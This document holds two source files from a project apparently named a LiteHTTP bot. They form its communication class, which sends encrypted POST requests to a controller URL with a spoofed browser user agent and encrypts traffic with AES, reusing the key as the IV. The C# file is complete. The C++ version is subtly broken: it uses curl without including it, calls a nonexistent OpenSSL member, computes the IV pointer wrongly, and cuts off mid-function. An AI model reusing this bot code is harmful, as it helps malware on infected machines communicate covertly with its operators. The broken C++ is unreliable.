File: Bot/LiteHTTP/Classes/Communication.cpp
#include <iostream>
#include <string>
#include <sstream>
#include <algorithm>
#include <iterator>
#include <vector>
#include <stdexcept>
#include <cstdio>
#include <cstring>

#include <openssl/evp.h>

using namespace std;

namespace LiteHTTP {
    namespace Classes {

        class Communication {
        public:
            static string makeRequest(const string& url, const string& parameters) {
                try {
                    string result;
                    vector<uint8_t> param(parameters.begin(), parameters.end());

                    // Create HTTP POST request
                    auto* req = curl_easy_init();
                    if (req == nullptr) {
                        throw runtime_error("Failed to create HTTP request");
                    }

                    curl_easy_setopt(req, CURLOPT_URL, url.c_str());
                    curl_easy_setopt(req, CURLOPT_POST, 1L);
                    curl_easy_setopt(req, CURLOPT_POSTFIELDS, &param[0]);
                    curl_easy_setopt(req, CURLOPT_POSTFIELDSIZE, param.size());
                    curl_easy_setopt(req, CURLOPT_USERAGENT, "E9BC3BD76216AFA560BFB5ACAF5731A3");
                    curl_easy_setopt(req, CURLOPT_HTTPHEADER, curl_slist_append(nullptr, "Content-Type: application/x-www-form-urlencoded"));

                    // Send HTTP request and receive response
                    curl_easy_setopt(req, CURLOPT_WRITEFUNCTION, &Communication::writeCallback);
                    curl_easy_setopt(req, CURLOPT_WRITEDATA, &result);

                    auto res = curl_easy_perform(req);
                    if (res != CURLE_OK) {
                        throw runtime_error("Failed to send HTTP request");
                    }

                    curl_easy_cleanup(req);
                    return result;
                }
                catch (...) {
                    return "rqf";
                }
            }

            static string encrypt(const string& input) {
                try {
                    string key = Settings::edkey;
                    const EVP_CIPHER* cipher = EVP_aes_256_cbc();
                    vector<uint8_t> ky(key.begin(), key.end());
                    vector<uint8_t> inp(input.begin(), input.end());
                    vector<uint8_t> res(inp.size() + cipher->block_size());

                    // Encrypt input using AES-256 CBC mode
                    EVP_CIPHER_CTX* ctx = EVP_CIPHER_CTX_new();
                    if (ctx == nullptr) {
                        throw runtime_error("Failed to create encryption context");
                    }

                    int len = 0;
                    if (!EVP_EncryptInit_ex(ctx, cipher, nullptr, &ky[0], &ky[0] + ky.size())) {
                        throw runtime_error("Failed to initialize encryption");
                    }
                    if (!EVP_EncryptUpdate(ctx, &res[0], &len, &inp[0], inp.size())) {
                        throw runtime_error("Failed to encrypt input");
                    }
                    int totalLen = len;
                    if (!EVP_EncryptFinal_ex(ctx, &res[len], &len)) {
                        throw runtime_error("Failed to finalize encryption");
                    }
                    totalLen += len;

                    EVP_CIPHER_CTX_free(ctx);

                    // Encode encrypted result as base64 string
                    auto base64 = [](const vector<uint8_t>& data) {
                        string base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
                        string result;
                        int padding = (3 - data.size() % 3) % 3;
                        uint32_t buffer = 0;
                        int bitsInBuffer = 0;
                        for (auto c : data) {
                            buffer = (buffer << 8) | c;
                            bitsInBuffer += 8;
                            while (bitsInBuffer >= 6) {
                                result += base64Chars[(buffer >> (bitsInBuffer - 6)) & 0x3F];

File: Bot/LiteHTTP/Classes/Communication.cs
using System;
using System.IO;
using System.Net;
using System.Security.Cryptography;
using System.Text;

namespace LiteHTTP.Classes
{
    class Communication
    {
        public static string makeRequest(string url, string parameters)
        {
            try
            {
                string result = null;
                byte[] param = Encoding.UTF8.GetBytes(parameters);
                HttpWebRequest req = (HttpWebRequest)WebRequest.Create(url);
                req.Method = "POST";
                req.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299";
                req.ContentType = "application/x-www-form-urlencoded";
                req.ContentLength = param.Length;
                req.Accept = "*/*";
                req.KeepAlive = true;
                req.ServicePoint.Expect100Continue = false;
                using (Stream st = req.GetRequestStream())
                {
                    st.Write(param, 0, param.Length);
                }
                using (WebResponse resp = req.GetResponse())
                {
                    using (StreamReader sr = new StreamReader(resp.GetResponseStream()))
                    {
                        result = sr.ReadToEnd();
                    }
                }
                return result;
            }
            catch
            {
                return "rqf";
            }
        }

        public static string encrypt(string input)
        {
            try
            {
                string key = Settings.edkey;
                RijndaelManaged rj = new RijndaelManaged();
                rj.Padding = PaddingMode.PKCS7;
                rj.Mode = CipherMode.CBC;
                rj.KeySize = 256;
                rj.BlockSize = 128;
                byte[] ky = Encoding.ASCII.GetBytes(key);
                byte[] inp = Encoding.UTF8.GetBytes(input);
                byte[] res;
                using (ICryptoTransform enc = rj.CreateEncryptor(ky, ky))
                {
                    using (MemoryStream ms = new MemoryStream())
                    {
                        using (CryptoStream cs = new CryptoStream(ms, enc, CryptoStreamMode.Write))
                        {
                            cs.Write(inp, 0, inp.Length);
                        }
                        res = ms.ToArray();
                    }
                }
                return Convert.ToBase64String(res).Replace("+", "-").Replace("/", "_");
            }
            catch
            {
                return null;
            }
        }

        public static string decrypt(string input)
        {
            try
            {
                string key = Settings.edkey;
                RijndaelManaged rj = new RijndaelManaged();
                rj.Padding = PaddingMode.PKCS7;
                rj.Mode = CipherMode.CBC;
                rj.KeySize = 256;
                rj.BlockSize = 128;
                byte[] ky = Encoding.ASCII.GetBytes(key);
                byte[] inp = Convert.FromBase64String(input.Replace("-", "+").Replace("_", "/"));
                byte[] res;
                using (ICryptoTransform dec = rj.CreateDecryptor(ky, ky))
                {
                    using (MemoryStream ms = new MemoryStream(inp))
                    {
                        using (CryptoStream cs = new CryptoStream(ms, dec, CryptoStreamMode.Read))
                        {
                            byte[] buffer = new byte[inp.Length];
                            int bytesRead = cs.Read(buffer, 0, buffer.Length);
                            res = new byte[bytesRead];
                            Array.Copy(buffer, res, bytesRead);
                        }
                    }
                }
                return Encoding.UTF8.GetString(res);
            }
            catch
            {
                return null;
            }
        }
    }
}
